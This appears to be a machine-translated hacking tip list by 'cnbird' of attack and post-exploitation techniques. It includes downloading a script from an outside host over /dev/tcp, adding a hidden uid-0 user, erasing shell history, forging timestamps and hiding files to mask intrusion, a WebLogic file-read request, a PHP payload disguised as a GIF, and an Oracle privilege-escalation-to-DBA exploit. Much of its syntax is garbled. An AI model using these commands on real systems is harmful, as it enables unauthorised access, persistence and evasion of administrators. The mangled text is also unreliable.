By: cnbird
1. download files without wget nc or other download tools
Exec 5 <>/dev/tcp/yese.yi.org/80 & echo-e "GET/c. pl HTTP/1.0"> & 5 & cat <& 5> c. pl
2. Users with uid 0 added to Linux
Useradd-o-u 0 cnbird
3. bash removes the history record
Export HISTSIZE = 0
Export HISTFILE =/dev/null
4. SSH reverse link
Ssh-C-f-N-g-R 44: 127.0.0.1: 22 cnbird @ ip-p specify the SSH port of the remote server
Then execute ssh localhost-p 44 on the server.
5. weblogic local File Reading Vulnerability
Curl-H "wl_request_type: wl_xml_entity_request"-H "xml-registryname :.. /.. /"-H" xml-entity-path: config. xml "http: // server/wl_management_internal2/wl_management
6. view the virtual web directory in apache
./Httpd-t-D DUMP_VHOSTS
7. cvs penetration skills
CVSROOT/passwd UNIX SHA1 Password File
CVSROOT/readers
CVSROOT/writers
CVS/Root
Files And Directories updated by CVS/Entries
CVS/Repository
8. Cpanel path Leakage
/3 rdparty/squirrelmail/functions/plugin. php
9. Modify the Upload File timestamp (mask intrusion traces)
Touch-r old file timestamp new file Timestamp
10. Search for the target host webshell using baidu and google
Intitle: PHPJackal 1t1t
11. Total package supplements
Create a temporary "hide" directory mkdir/tmp /...
/Tmp/... the directory is "hidden" when the Administrator has a sleep. You can temporarily put some exp.
12. use linux output to bypass gif restrictions
Printf "GIF89ax01x00x01x00 <? Php phpinfo ();?> "> Poc. php
13. Reading environment variables is very helpful for searching information.
/Proc/self/environ
14. Upgrade user permissions (as long as session permissions) in the latest ORACLE 11)
IMPORT_JVM_PERMS in DBMS_JVM_EXP_PERMS
Determine logon Permissions
Select * from session_privs;
Create SESSION
Select * from session_roles;
Select TYPE_NAME, NAME, action from sys. DBA_JAVA_POLICY Where GRANTEE = GREMLIN (User NAME );
Desc java $ POLICY $
DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS Select grant user (), SYS, java. io. FilePermission, <all files>, execute, enable from dual;
BEGIN
OPEN C1;
FETCH C1 bulk collect into pol;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS (POL );
END;
/
Connect/as sysdba
COL TYPE_NAME FOR A30;
Col name for A30;
COL_ACTION FOR A10;
Select TYPE_NAME, NAME, action from sys. DBA_JAVA_POLICY Where GRANTEE = user;
Connect common users
Set serveroutput on
Exec dbms_java.set_output (10000 );
Select DBMS_JAVA.SET_OUTPUT_TO_JAVA (ID, oracle/aurora/rdbms/DbmsJava, SYS, writeOutputToFile, TEXT, NULL, 0, 1, 1, 1, 0, declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant dba to user; END;, begin null; END;) from dual;
EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS (no_such_sub1_, SYSDATE ());
Set role dba;
Select * from session_privs;
Exec sys. VULNPROC (FOO "| encrypt (" ID "," declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate "" grant dba to public ""; DBMS_OUTPUT.PUT_LINE (: 1); END ;", "TEXT") | "BAR );
Select DBMS_JAVA.RUNJAVA (oracle/aurora/util/Test) from dual;
Set role dba;
15. webLogic penetration skills
4. Weblogin Script Tool (WLST)
Write to <Domain_home> \ config. xml
1. Modify:
<Bea_home> wlserver_10.0serverinsetWLSenv.sh
2. Start WLST
Java weblogic. WLST
Wls:/offline> connect (admin, admin, t3: // 127.0.0.1: 7001)
Wls:/bbk/serverConfig> help ()
Wls:/bbk/serverConfig> edit ()
Wls:/bbk/serverConfig> cd (Servers)
Wls:/bbk/serverConfig/Server-cnbird> cd (Log)
Wls:/bbk/serverConfig/Server-cnbird/log> cd (Server-cnbird)
Wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit ()
Wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird!> Set (FileCount, 4)
Wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird!> Save ()
Wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird!> Activate () submits the corresponding Active Change
Wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird!> Disconnect ()
Wls:/offline> exit ()
3. batch processing:
Save the preceding command as cnbird. py.
Connect (admin, admin, t3: // 127.0.0.1: 7001)
Cd (Servers)
Cd (Log)
Cd (Server-cnbird)
StartEdit ()
Set (FileCount, 4)
Save ()
Then run java weblogic. WLST cnbird. py